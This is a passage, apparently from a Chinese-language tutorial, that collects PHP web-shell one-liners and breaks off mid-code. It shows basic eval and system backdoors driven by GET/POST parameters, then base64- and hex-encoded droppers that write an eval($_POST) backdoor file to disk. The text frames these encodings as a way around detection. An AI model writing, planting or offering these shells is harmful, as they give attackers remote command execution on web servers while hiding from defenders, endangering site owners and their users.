一、基础类的一句话--功能仅限于验证漏洞了,实际中太容易被查出出来:
1 <?php @eval($_GET["code"])?>
2 <?php @system($_POST["cmd"])?>
相信一目了然可以看懂如何使用这类一句话。
二、编码的替换的类型:
1 <?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?>
2 //会生成<?php @eval($_POST['lostwolf']);?>
3
4
5 //php在html内部的一种嵌入方式
6
7 <?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?>
8
9
10 <?php
11 session_start();
12 $_